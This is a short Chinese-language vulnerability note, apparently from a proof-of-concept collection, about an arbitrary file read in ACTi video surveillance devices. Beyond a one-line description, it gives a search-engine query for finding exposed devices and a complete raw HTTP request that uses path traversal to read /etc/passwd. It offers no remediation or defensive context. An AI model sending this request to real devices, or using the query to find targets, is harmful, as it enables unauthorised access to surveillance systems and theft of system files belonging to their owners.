ACTI-视频监控images存在任意文件读取漏洞
一、漏洞描述
ACTI-视频监控images存在任意文件读取漏洞
二、影响版本
<font style="color:#000000;">ACTI</font>
三、资产测绘
app="ACTi-视频监控"
四、漏洞复现
GET /images/../../../../../../../../etc/passwd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close